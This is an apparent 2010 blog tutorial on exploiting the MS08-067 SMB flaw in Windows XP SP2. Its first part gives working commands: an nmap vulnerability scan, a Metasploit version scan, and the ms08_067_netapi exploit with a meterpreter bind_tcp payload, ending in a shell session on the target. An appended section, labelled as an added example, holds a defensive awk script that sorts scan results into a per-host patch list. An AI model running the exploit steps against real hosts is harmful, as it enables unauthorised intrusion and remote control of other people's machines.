Tuesday, March 9, 2010

Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability

Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)

Step 1: Scan for SMB Vulnerability (netapi = MS08-067)


nmap -sS --script=smb-check-vulns 192.168.1.50

Step 2: Check the SMB Version (O/S, SP level & Language)

cd /pentest/exploits/msf3
./msfconsole

msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run

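Step 3: Exploit with MS08-067 module

The TARGET number depends on the result of Step 2: pick the entry from "show targets" that matches the O/S, SP level and language reported there.

msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3
msf > run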

meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
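
The Step 1 scan is also how a defender finds hosts that still lack the MS08-067 update. The script below is an added example, not part of the original post: it turns saved nmap output into a per-host patch list. The sample scan output is constructed, and its layout (a "Nmap scan report for" line per host, then a "MS08-067: <status>" line) is an assumption about nmap's normal output format.

```shell
#!/bin/sh
# Added example: triage Step 1 scan output into a patch list for MS08-067.
# Assumed layout: "Nmap scan report for <host>" followed by "MS08-067: <status>".

# Constructed sample output (not from a real scan).
sample_scan() {
cat <<'EOF'
Nmap scan report for 192.168.1.50
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|_  Conficker: Likely CLEAN

Nmap scan report for 192.168.1.51
Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|_  Conficker: Likely CLEAN

Nmap scan report for 192.168.1.52
Host script results:
| smb-check-vulns:
|   MS08-067: ERROR (connection timed out)
|_  Conficker: Likely CLEAN

Nmap scan report for fileserver.example (192.168.1.53)
EOF
}

# Prints "<host> PATCH|OK|RECHECK". The status is compared exactly, because a
# plain grep for VULNERABLE also matches NOT VULNERABLE. A host with no result
# or an inconclusive one is RECHECK, never OK.
triage_ms08_067() {
  awk '
    function emit() { if (host != "") print host, verdict }
    /^Nmap scan report for / { emit(); host = $NF; gsub(/[()]/, "", host); verdict = "RECHECK" }
    /MS08-067:/ {
      status = $0
      sub(/^.*MS08-067:[ \t]*/, "", status)
      sub(/[ \t\r]+$/, "", status)
      if (status == "VULNERABLE") verdict = "PATCH"
      else if (status == "NOT VULNERABLE") verdict = "OK"
      else verdict = "RECHECK"
    }
    END { emit() }
  '
}

sample_scan | triage_ms08_067
```

To use it on a real scan, save the nmap output to a file and pipe that file into triage_ms08_067 instead of sample_scan.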

